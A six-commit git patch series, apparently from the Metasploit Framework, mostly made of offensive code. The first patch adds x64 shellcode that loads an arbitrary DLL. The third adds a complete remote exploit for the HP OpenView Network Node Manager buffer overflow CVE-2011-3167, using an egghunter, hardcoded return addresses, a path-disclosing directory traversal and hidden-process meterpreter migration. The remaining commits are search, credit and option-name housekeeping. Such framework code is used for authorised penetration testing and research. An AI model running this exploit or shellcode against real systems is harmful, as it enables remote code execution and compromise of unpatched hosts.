From 9fe18cdc8671adfcf04ffbb0707a515eb9e0451f Mon Sep 17 00:00:00 2001 From: scriptjunkie Date: Tue, 17 Jan 2012 21:16:26 -0600 Subject: [PATCH 1/6] Add x64 LoadLibraryA payload. Because it should exist. --- .../x64/src/single/single_loadlibrary.asm | 24 ++++++ .../singles/windows/x64/loadlibrary.rb | 74 +++++++++++++++++++ 2 files changed, 98 insertions(+) create mode 100644 external/source/shellcode/windows/x64/src/single/single_loadlibrary.asm create mode 100644 modules/payloads/singles/windows/x64/loadlibrary.rb diff --git a/external/source/shellcode/windows/x64/src/single/single_loadlibrary.asm b/external/source/shellcode/windows/x64/src/single/single_loadlibrary.asm new file mode 100644 index 0000000000..5ba96f0f7d --- /dev/null +++ b/external/source/shellcode/windows/x64/src/single/single_loadlibrary.asm @@ -0,0 +1,24 @@ +;-----------------------------------------------------------------------------; +; Author: scriptjunkie (scriptjunkie[at]scriptjunkie[dot]us), +; Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com) +; Compatible: Windows 7, 2003 +; 17 Jan 2012 +;-----------------------------------------------------------------------------; + +[BITS 64] +[ORG 0] + + cld ; Clear the direction flag. + and rsp, 0xFFFFFFFFFFFFFFF0 ; Ensure RSP is 16 byte aligned + call start ; Call start, this pushes the address of 'api_call' onto the stack. +delta: ; +%include "./src/block/block_api.asm" ; +start: ; + pop rbp ; Pop off the address of 'api_call' for calling later. + lea rcx, [ebp+libpath-delta] + mov r10d, 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" ) + call rbp ; LoadLibraryA( &libpath ); + ; Finish up with the EXITFUNK. +%include "./src/block/block_exitfunk.asm" +libpath: + ;db "funkystuff.dll", 0 diff --git a/modules/payloads/singles/windows/x64/loadlibrary.rb b/modules/payloads/singles/windows/x64/loadlibrary.rb new file mode 100644 index 0000000000..e1918b5db2 --- /dev/null +++ b/modules/payloads/singles/windows/x64/loadlibrary.rb @@ -0,0 +1,74 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + + +require 'msf/core' + + +module Metasploit3 + + include Msf::Payload::Windows + include Msf::Payload::Single + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'Windows x64 LoadLibrary Path', + 'Version' => '$Revision$', + 'Description' => 'Load an arbitrary x64 library path', + 'Author' => [ 'scriptjunkie', 'sf' ], + 'License' => MSF_LICENSE, + 'Platform' => 'win', + 'Arch' => ARCH_X86_64, + 'PayloadCompat' => + { + 'Convention' => '-http -https', + }, + 'Payload' => + { + 'Offsets' => + { + 'EXITFUNC' => [ 228, 'V' ] + }, + 'Payload' => + "\xFC\x48\x83\xE4\xF0\xE8\xC8\x00\x00\x00\x41\x51\x41\x50\x52\x51" + + "\x56\x48\x31\xD2\x65\x48\x8B\x52\x60\x48\x8B\x52\x18\x48\x8B\x52" + + "\x20\x48\x8B\x72\x50\x48\x0F\xB7\x4A\x4A\x4D\x31\xC9\x48\x31\xC0" + + "\xAC\x3C\x61\x7C\x02\x2C\x20\x41\xC1\xC9\x0D\x41\x01\xC1\xE2\xED" + + "\x52\x41\x51\x48\x8B\x52\x20\x8B\x42\x3C\x48\x01\xD0\x66\x81\x78" + + "\x18\x0B\x02\x75\x72\x8B\x80\x88\x00\x00\x00\x48\x85\xC0\x74\x67" + + "\x48\x01\xD0\x50\x8B\x48\x18\x44\x8B\x40\x20\x49\x01\xD0\xE3\x56" + + "\x48\xFF\xC9\x41\x8B\x34\x88\x48\x01\xD6\x4D\x31\xC9\x48\x31\xC0" + + "\xAC\x41\xC1\xC9\x0D\x41\x01\xC1\x38\xE0\x75\xF1\x4C\x03\x4C\x24" + + "\x08\x45\x39\xD1\x75\xD8\x58\x44\x8B\x40\x24\x49\x01\xD0\x66\x41" + + "\x8B\x0C\x48\x44\x8B\x40\x1C\x49\x01\xD0\x41\x8B\x04\x88\x48\x01" + + "\xD0\x41\x58\x41\x58\x5E\x59\x5A\x41\x58\x41\x59\x41\x5A\x48\x83" + + "\xEC\x20\x41\x52\xFF\xE0\x58\x41\x59\x5A\x48\x8B\x12\xE9\x4F\xFF" + + "\xFF\xFF\x5D\x67\x48\x8D\x8D\x00\x01\x00\x00\x41\xBA\x4C\x77\x26" + + "\x07\xFF\xD5\xBB\xE0\x1D\x2A\x0A\x41\xBA\xA6\x95\xBD\x9D\xFF\xD5" + + "\x48\x83\xC4\x28\x3C\x06\x7C\x0A\x80\xFB\xE0\x75\x05\xBB\x47\x13" + + "\x72\x6F\x6A\x00\x59\x41\x89\xDA\xFF\xD5" + } + )) + register_options( + [ + OptString.new('DLL', [ true, "The library path to load (UNC is OK)" ]), + ], self.class ) + end + + def generate + return super + dll_string + "\x00" + end + + def dll_string + return datastore['DLL'] || '' + end + +end From 955b02e22712a2478b9dbac8a28bca85d6cc4b73 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Wed, 18 Jan 2012 11:19:37 -0600 Subject: [PATCH 2/6] Allow 'port' option in module searching (idea originally from Brandon Perry's blog) --- lib/msf/core/module.rb | 2 ++ lib/msf/ui/console/command_dispatcher/core.rb | 1 + 2 files changed, 3 insertions(+) diff --git a/lib/msf/core/module.rb b/lib/msf/core/module.rb index 347cc1cc0f..d8c3396656 100644 --- a/lib/msf/core/module.rb +++ b/lib/msf/core/module.rb @@ -690,6 +690,8 @@ class Module if not match and self.respond_to?(:targets) and self.targets match = [t,w] if self.targets.map{|x| x.name}.any? { |t| t =~ r } end + when 'port' + match = [t,w] if self.datastore['RPORT'].to_s =~ r when 'type' match = [t,w] if (w == "exploit" and is_exploit) match = [t,w] if (w == "auxiliary" and is_auxiliary) diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index eb1dd06ba0..faf00bff15 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -1285,6 +1285,7 @@ class Core "name" => "Modules with a matching descriptive name", "path" => "Modules with a matching path or reference name", "platform" => "Modules affecting this platform", + "port" => "Modules with a matching remote port", "type" => "Modules of a specific type (exploit, auxiliary, or post)", "app" => "Modules that are client or server attacks", "author" => "Modules written by this author", From 064a71fb1df20d8fa2a28d38e23cc0848155e2b7 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Wed, 18 Jan 2012 12:05:18 -0600 Subject: [PATCH 3/6] Add CVE-2011-3167 HP OpenView NNM exploit (Feature #6245) --- .../http/hp_nnm_ovbuildpath_textfile.rb | 277 ++++++++++++++++++ 1 file changed, 277 insertions(+) create mode 100644 modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb diff --git a/modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb b/modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb new file mode 100644 index 0000000000..ef400d55fa --- /dev/null +++ b/modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb @@ -0,0 +1,277 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + HttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/webappmon.exe', :pattern => /Hewlett-Packard Development Company/ } + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Remote::Egghunter + + def initialize(info={}) + super(update_info(info, + 'Name' => 'HP OpenView Network Node Manager ov.dll _OVBuildPath Buffer Overflow', + 'Description' => %q{ + This module exploits a stack buffer overflow in HP OpenView Network Node + Manager 7.53 prior to NNM_01213 without the SSRT100649 hotfix. By specifying a long + 'textFile' argument when calling the 'webappmon.exe' CGI program, an attacker can + cause a stack-based buffer overflow and execute arbitrary code. + + The vulnerable code is within the "_OVBuildPath" function within "ov.dll". There + are no stack cookies, so exploitation is achieved by overwriting the saved return + address. + + The vulnerability is due to the use of the function "_OVConcatPath" which finally + uses "strcat" in a insecure way. User controlled data is concatenated to a string + which contains the OpenView installation path. + + To achieve reliable exploitation a directory traversal in OpenView5.exe + (OSVDB 44359) is being used to retrieve OpenView logs and disclose the installation + path. If the installation path cannot be guessed the default installation path + is used. + } , + 'Author' => + [ + 'Anyway ', # Vulnerability Discovery + 'juan vazquez', # Metasploit module + 'sinn3r' # Metasploit fu + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2011-3167' ], + [ 'OSVDB', '76775' ], + [ 'BID', '50471' ], + [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-002/' ], + [ 'URL', 'https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03054052' ] + ], + 'Payload' => + { + 'Space' => 950, + 'BadChars' => [*(0x00..0x09)].pack("C*") + [*(0x0b..0x23)].pack("C*") + [0x26, 0x2b, 0x3c, 0x3e, 0x5b, 0x5d, 0x5e, 0x60, 0x7e, 0x7f].pack("C*"), + 'DisableNops' => true, + 'EncoderOptions' => + { + 'BufferRegister' => 'EDI' # Egghunter jmp edi + } + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'HP OpenView Network Node Manager 7.53 / Windows 2000 SP4 & Windows XP SP3', + # Patches installed: + # * ECS_00048 + # * NNM_01128 + # * NNM_01172 + # * NNM_01187 + { + 'Offset' => 1067, + 'Ret' => 0x5a41656a, # pop/pop/ret - in ov.dll (v1.30.5.8002) + 'JmpESP' => 0x5a4251c5, # call esp - in ov.dll + 'EggAdjust' => 4, + 'ReadableAddress' => 0x5a466930 # ov.dll + } + ] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Nov 01 2011')) + + register_options( + [ + Opt::RPORT(80), + ], self.class) + end + + # The following code allows to migrate if having into account + # that over Windows XP permissions aren't granted on %windir%\system32 + # + # Code ripped from "modules/post/windows/manage/migrate.rb". See it + # for more information + def on_new_session(client) + + if client.type != "meterpreter" + print_error("NOTE: you must use a meterpreter payload in order to process migration.") + return + end + + client.core.use("stdapi") if not client.ext.aliases.include?("stdapi") + + # Select path and executable to run depending the architecture + # and the operating system + if client.sys.config.sysinfo["OS"] =~ /Windows XP/ + windir = client.fs.file.expand_path("%ProgramFiles%") + cmd="#{windir}\\Windows NT\\Accessories\\wordpad.exe" + else # Windows 2000 + windir = client.fs.file.expand_path("%windir%") + if client.sys.config.sysinfo['Architecture'] =~ /x86/ + cmd = "#{windir}\\System32\\notepad.exe" + else + cmd = "#{windir}\\Sysnative\\notepad.exe" + end + end + + # run hidden + print_status("Spawning #{cmd.split("\\").last} process to migrate to") + proc = client.sys.process.execute(cmd, nil, {'Hidden' => true }) + target_pid = proc.pid + + begin + print_good("Migrating to #{target_pid}") + client.core.migrate(target_pid) + print_good("Successfully migrated to process #{target_pid}") + rescue ::Exception => e + print_error("Could not migrate in to process.") + print_error(e.to_s) + end + + end + + # Tries to guess the HP OpenView install dir via the Directory traversal identified + # by OSVDB 44359. + # If OSVDB 44359 doesn't allow to retrieve the installation path the default one + # (C:\Program Files\HP OpenView\) is used. + # Directory Traversal used: + # http://host/OvCgi/OpenView5.exe?Context=Snmp&Action=../../../log/setup.log + def get_install_path + + cgi = '/OvCgi/OpenView5.exe' + web_session = rand_text_numeric(3) + my_cookie = "OvOSLocale=English_United States.1252; " + my_cookie << "OvAcceptLang=en-US; " + my_cookie << "OvJavaLocale=en_US.Cp1252; " + my_cookie << "OvWebSession=#{web_session}:AnyUser:" + + payload = "../../../log/setup.log" + res = send_request_cgi({ + 'uri' => cgi, + 'cookie' => my_cookie, + 'method' => "GET", + 'vars_get' => + { + 'Target' => "Main", + 'Scope' => "Snmp", + 'Action' => payload + } + }, 5) + + installation_path = "" + if res and res.code == 200 and + res.body =~ /([A-Z]:\\.*\\)log/ + print_status("Installation Path Found in #{$1}") + installation_path = $1 + else + print_status("Installation Path Not Found using the default") + installation_path = "C:\\Program Files\\HP OpenView\\" + end + + return installation_path + end + + def exploit + print_status("Trying target #{target.name}...") + + install_path = get_install_path + install_path << "help\\English_United States.1252" + + eggoptions = { + :checksum => true, + } + hunter,egg = generate_egghunter(payload.encoded, payload_badchars, eggoptions) + + [ 'x86/alpha_mixed'].each { |name| + enc = framework.encoders.create(name) + if name =~/alpha/ + # If control is transferred to the decoder via "call esp" BufferOfset + # shoulds be adjusted. + if target["EggAdjust"] and target["EggAdjust"] > 0 + enc_options = { + 'BufferRegister' => 'ESP', + 'BufferOffset' => target["EggAdjust"] + } + enc.datastore.import_options_from_hash(enc_options) + else + enc.datastore.import_options_from_hash({ 'BufferRegister' => 'ESP' }) + end + end + hunter = enc.encode(hunter, nil, nil, platform) + } + + offset = target['Offset'] - install_path.length - egg.length + + my_payload = egg + my_payload << rand_text_alphanumeric(offset) + my_payload << [target.ret].pack("V") + my_payload << rand_text_alphanumeric(4) # Padding + my_payload << [target["ReadableAddress"]].pack("V") + my_payload << [target["JmpESP"]].pack("V") + my_payload << hunter + + buf = "-textFile+#{my_payload}+++++++++++++++++++++++" + buf << "-appendSelectList+-appendSelectListToTitle+%09%09++++++" + buf << "-commandHeading+%22Protocol+++++++++Port++++++++Service%22+++++++++++++++++++++++" + buf << "-dataLine+2+" + buf << "-commandTitle+%22Services%22+%09%09++++++" + buf << "-iconName+%22Services%22+++++++++++++++++++++++" + buf << "-cmd+rnetstat+" + buf << "-S" + + web_session = rand_text_numeric(3) + my_cookie = "OvOSLocale=English_United States.1252; " + my_cookie << "OvAcceptLang=en-US; " + my_cookie << "OvJavaLocale=en_US.Cp1252; " + my_cookie << "OvWebSession=#{web_session}:AnyUser:" + + cgi = '/OvCgi/webappmon.exe' + + res = send_request_cgi({ + 'uri' => cgi, + 'cookie' => my_cookie, + 'method' => "POST", + 'vars_post' => + { + 'ins' => 'nowait', + 'sel' => rand_text_alphanumeric(15), + 'app' => 'IP Tables', + 'act' => 'Services', + 'help' => '', + 'cache' => rand_text_numeric(4) + }, + 'data' => "arg=#{buf}" # Avoid uri encoding + }, 3) + + if res and res.code != 502 + print_error("Eek! We weren't expecting a response, but we got one") + if datastore['DEBUG'] + print_line() + print_error(res.inspect) + end + end + + handler + + end + +end + +=begin + +* migrate to %windir%/system32/notepad.exe fails on Windows XP SP3 + +meterpreter > run post/windows/manage/migrate + +[*] Running module against HOME-F006222D6C +[*] Current server process: webappmon.exe (7064) +[*] Spawning notepad.exe process to migrate to +[-] Post failed: Rex::Post::Meterpreter::RequestError stdapi_sys_process_execute: Operation failed: Access is denied. +[-] Call stack: +[-] /projects/exploiting/trunk/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb:163:in `execute' +[-] (eval):80:in `create_temp_proc' +[-] (eval):49:in `run' +=end \ No newline at end of file From d6e8f0b54d7593620cfc479f5fe2b63b3b6f98fb Mon Sep 17 00:00:00 2001 From: sinn3r Date: Wed, 18 Jan 2012 13:33:27 -0600 Subject: [PATCH 4/6] Add Felipe as an author (plus a reference) because looks like the PoC originally came from him. --- modules/exploits/windows/fileformat/adobe_reader_u3d.rb | 2 ++ 1 file changed, 2 insertions(+) diff --git a/modules/exploits/windows/fileformat/adobe_reader_u3d.rb b/modules/exploits/windows/fileformat/adobe_reader_u3d.rb index ce555037e8..8ebc891e82 100644 --- a/modules/exploits/windows/fileformat/adobe_reader_u3d.rb +++ b/modules/exploits/windows/fileformat/adobe_reader_u3d.rb @@ -28,6 +28,7 @@ class Metasploit3 < Msf::Exploit::Remote 'License' => MSF_LICENSE, 'Author' => [ + 'Felipe Andres Manzano', #Original poc (@feliam) 'sinn3r', 'juan vazquez', 'jduck' @@ -40,6 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote [ 'URL', 'http://www.adobe.com/support/security/advisories/apsa11-04.html' ], [ 'URL', 'http://blog.vulnhunt.com/index.php/2011/12/12/cve-2011-2462-pdf-0day-analysis/' ], [ 'URL', 'http://blog.9bplus.com/analyzing-cve-2011-2462' ], + [ 'URL', 'https://sites.google.com/site/felipeandresmanzano/PDFU3DExploitJS_CVE_2009_2990.py?attredirects=0'], #Original PoC [ 'URL', 'http://contagiodump.blogspot.com/2011/12/adobe-zero-day-cve-2011-2462.html' ] ], 'DefaultOptions' => From ad6f8257e170b81e2588093569b9e804a9a31d38 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Wed, 18 Jan 2012 15:01:00 -0600 Subject: [PATCH 5/6] MSFTidy fixes. --- modules/auxiliary/scanner/mssql/mssql_schemadump.rb | 9 +++++---- modules/auxiliary/scanner/mysql/mysql_schemadump.rb | 4 ++-- .../auxiliary/scanner/postgres/postgres_schemadump.rb | 3 +-- modules/exploits/osx/browser/mozilla_mchannel.rb | 2 +- modules/post/windows/gather/enum_artifacts.rb | 8 ++++---- 5 files changed, 13 insertions(+), 13 deletions(-) diff --git a/modules/auxiliary/scanner/mssql/mssql_schemadump.rb b/modules/auxiliary/scanner/mssql/mssql_schemadump.rb index 50a4879e65..707db19602 100644 --- a/modules/auxiliary/scanner/mssql/mssql_schemadump.rb +++ b/modules/auxiliary/scanner/mssql/mssql_schemadump.rb @@ -83,17 +83,17 @@ class Metasploit3 < Msf::Auxiliary unless tmp_tblnames.nil? tmp_db['DBName']= dbname[0] tmp_db['Tables'] = [] - tmp_tblnames.each do |tblname| + tmp_tblnames.each do |tblname| next if tblname[0].nil? tmp_tbl = {} - tmp_tbl['TableName'] = tblname[0] + tmp_tbl['TableName'] = tblname[0] tmp_tbl['Columns'] = [] tmp_columns = get_columns(dbname[0], tblname[1]) unless tmp_columns.nil? tmp_columns.each do |column| - next if column[0].nil? + next if column[0].nil? tmp_column = {} - tmp_column['ColumnName'] = column[0] + tmp_column['ColumnName'] = column[0] tmp_column['ColumnType'] = column[1] tmp_column['ColumnLength'] = column[2] tmp_tbl['Columns'] << tmp_column @@ -121,6 +121,7 @@ class Metasploit3 < Msf::Auxiliary return results end + # TODO: This should be split up, I fear nil problems in these query/response parsings def get_columns(db_name, table_id) results = mssql_query("Select syscolumns.name,systypes.name,syscolumns.length from #{db_name}..syscolumns JOIN #{db_name}..systypes ON syscolumns.xtype=systypes.xtype WHERE syscolumns.id=#{table_id}")[:rows] return results diff --git a/modules/auxiliary/scanner/mysql/mysql_schemadump.rb b/modules/auxiliary/scanner/mysql/mysql_schemadump.rb index ccc4f83046..21ba20b60a 100644 --- a/modules/auxiliary/scanner/mysql/mysql_schemadump.rb +++ b/modules/auxiliary/scanner/mysql/mysql_schemadump.rb @@ -24,7 +24,7 @@ class Metasploit3 < Msf::Auxiliary 'Name' => 'MYSQL Schema Dump', 'Version' => '$Revision$', 'Description' => %Q{ - This module extracts the schema information from a + This module extracts the schema information from a MySQL DB server. }, 'Author' => ['TheLightCosine '], @@ -86,7 +86,7 @@ class Metasploit3 < Msf::Auxiliary unless tmp_clmnames.nil? or tmp_clmnames.empty? tmp_clmnames.each do |column| tmp_column = {} - tmp_column['ColumnName'] = column[0] + tmp_column['ColumnName'] = column[0] tmp_column['ColumnType'] = column[1] tmp_tbl['Columns'] << tmp_column end diff --git a/modules/auxiliary/scanner/postgres/postgres_schemadump.rb b/modules/auxiliary/scanner/postgres/postgres_schemadump.rb index 8810322897..9568322d5d 100644 --- a/modules/auxiliary/scanner/postgres/postgres_schemadump.rb +++ b/modules/auxiliary/scanner/postgres/postgres_schemadump.rb @@ -24,7 +24,7 @@ class Metasploit3 < Msf::Auxiliary 'Name' => 'Postgres Schema Dump', 'Version' => '$Revision$', 'Description' => %Q{ - This module extracts the schema information from a + This module extracts the schema information from a Postgres server. }, 'Author' => ['TheLightCosine '], @@ -117,7 +117,6 @@ class Metasploit3 < Msf::Auxiliary when :complete return res[:complete].rows end - end diff --git a/modules/exploits/osx/browser/mozilla_mchannel.rb b/modules/exploits/osx/browser/mozilla_mchannel.rb index 70ed1a5adb..5d49e4c115 100644 --- a/modules/exploits/osx/browser/mozilla_mchannel.rb +++ b/modules/exploits/osx/browser/mozilla_mchannel.rb @@ -26,7 +26,7 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Mozilla Firefox 3.6.16 mChannel use after free vulnerability', 'Description' => %q{ - This module exploits an use after free vulnerability in Mozilla + This module exploits a use-after-free vulnerability in Mozilla Firefox 3.6.16. An OBJECT Element mChannel can be freed via the OnChannelRedirect method of the nsIChannelEventSink Interface. mChannel becomes a dangling pointer and can be reused when setting the OBJECTs diff --git a/modules/post/windows/gather/enum_artifacts.rb b/modules/post/windows/gather/enum_artifacts.rb index 3721a14853..2be2341960 100644 --- a/modules/post/windows/gather/enum_artifacts.rb +++ b/modules/post/windows/gather/enum_artifacts.rb @@ -15,12 +15,12 @@ class Metasploit3 < Msf::Post include Msf::Auxiliary::Report include Msf::Post::File include Msf::Post::Windows::Registry - + def initialize(info={}) super( update_info( info, 'Name' => 'Windows File and Registry Artifacts Enumeration', 'Description' => %q{ - This module will check the file system and registry for particular artifacts. The + This module will check the file system and registry for particular artifacts. The list of artifacts is read from data/post/artifacts or a user specified file. Any matches are written to the loot. }, 'License' => MSF_LICENSE, @@ -54,7 +54,7 @@ class Metasploit3 < Msf::Post # Start enumerating print_status("Processing artifacts file...") - file = ::File.open(filename, "r") + file = ::File.open(filename, "rb") file.each_line do |line| line.strip! next if line.length < 1 @@ -103,4 +103,4 @@ end =begin To-do: Use CSV or yaml format to store enum_artifacts_list.txt -=end \ No newline at end of file +=end From bb035bfec2e8fd2df4004b57c4d6b41ac1b79c25 Mon Sep 17 00:00:00 2001 From: HD Moore Date: Wed, 18 Jan 2012 15:05:39 -0600 Subject: [PATCH 6/6] Fix up API option names so they can be set globally --- modules/auxiliary/gather/corpwatch_lookup_name.rb | 4 ++-- modules/auxiliary/gather/shodan_search.rb | 4 ++-- modules/auxiliary/scanner/http/httpbl_lookup.rb | 4 ++-- 3 files changed, 6 insertions(+), 6 deletions(-) diff --git a/modules/auxiliary/gather/corpwatch_lookup_name.rb b/modules/auxiliary/gather/corpwatch_lookup_name.rb index 503bbe0f54..4739a8e7c0 100644 --- a/modules/auxiliary/gather/corpwatch_lookup_name.rb +++ b/modules/auxiliary/gather/corpwatch_lookup_name.rb @@ -35,7 +35,7 @@ class Metasploit3 < Msf::Auxiliary OptString.new('COMPANY_NAME', [ true, "Search for companies with this name", ""]), OptString.new('YEAR', [ false, "Limit results to a specific year", ""]), OptString.new('LIMIT', [ true, "Limit the number of results returned", "5"]), - OptString.new('API_KEY', [ false, "Use this API key when getting the data", ""]), + OptString.new('CORPWATCH_APIKEY', [ false, "Use this API key when getting the data", ""]), ], self.class) deregister_options('RHOST', 'RPORT', 'Proxies', 'VHOST') @@ -67,7 +67,7 @@ class Metasploit3 < Msf::Auxiliary { 'company_name' => datastore['COMPANY_NAME'], 'limit' => datastore['LIMIT'], - 'key' => datastore['API_KEY'] + 'key' => datastore['CORPWATCH_APIKEY'] } }, 25) diff --git a/modules/auxiliary/gather/shodan_search.rb b/modules/auxiliary/gather/shodan_search.rb index 7fe22f73d6..f8a89fa433 100644 --- a/modules/auxiliary/gather/shodan_search.rb +++ b/modules/auxiliary/gather/shodan_search.rb @@ -45,7 +45,7 @@ class Metasploit4 < Msf::Auxiliary register_options( [ - OptString.new('APIKEY', [true, "The SHODAN API key"]), + OptString.new('SHODAN_APIKEY', [true, "The SHODAN API key"]), OptString.new('QUERY', [true, "Keywords you want to search for"]), OptString.new('OUTFILE', [false, "A filename to store the list of IPs"]), OptBool.new('DATABASE', [false, "Add search results to the database", false]), @@ -89,7 +89,7 @@ class Metasploit4 < Msf::Auxiliary def run # create our Shodan request parameters query = datastore['QUERY'] - apikey = datastore['APIKEY'] + apikey = datastore['SHODAN_APIKEY'] @res = Net::DNS::Resolver.new() dns_query = @res.query("#{datastore['VHOST']}", "A") diff --git a/modules/auxiliary/scanner/http/httpbl_lookup.rb b/modules/auxiliary/scanner/http/httpbl_lookup.rb index 430df3574b..5342aaf2ce 100644 --- a/modules/auxiliary/scanner/http/httpbl_lookup.rb +++ b/modules/auxiliary/scanner/http/httpbl_lookup.rb @@ -36,7 +36,7 @@ class Metasploit3 < Msf::Auxiliary register_options( [ # OptAddressRange.new('RHOSTS', [false, "The target address, range, or CIDR identifier"]), - OptString.new('APIKEY', [ true, "Your HTTP:BL api key"]) + OptString.new('HTTPBL_APIKEY', [ true, "Your HTTP:BL api key"]) ], self.class) end @@ -47,7 +47,7 @@ class Metasploit3 < Msf::Auxiliary def resolve(ip) results = '' - apikey = datastore['apikey'] + apikey = datastore['HTTPBL_APIKEY'] query = apikey + '.' + ip.split('.').reverse.join('.') + '.dnsbl.httpbl.org' begin results = Resolv::DNS.new.getaddress(query).to_s